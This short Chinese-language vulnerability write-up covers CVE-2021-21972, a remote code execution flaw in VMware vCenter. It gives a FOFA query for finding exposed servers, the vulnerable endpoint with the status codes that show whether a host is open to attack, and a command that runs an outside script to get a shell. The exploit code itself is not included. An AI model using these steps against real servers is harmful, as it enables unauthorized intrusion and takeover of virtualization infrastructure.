VMware vCenter 存在远程代码执行漏洞(CVE-2021-21972)
一、漏洞简介
VMware vCenter Server是美国威睿(Vmware)公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台,可自动实施和交付虚拟基础架构。VMware vCenter 存在远程代码执行漏洞(CVE-2021-21972)
二、影响版本
- VMware vCenter
三、资产测绘
- fofa
title="ID_VC_Welcome"
四、漏洞复现
/ui/vropspluginui/rest/services/updateova
访问上面地址,如果出现404、401即不存在漏洞
如果出现405、200即存在漏洞
CVE-2021-21972-main.zip
使用脚本直接getshell
python3 jiaoben.py -url https://127.0.0.1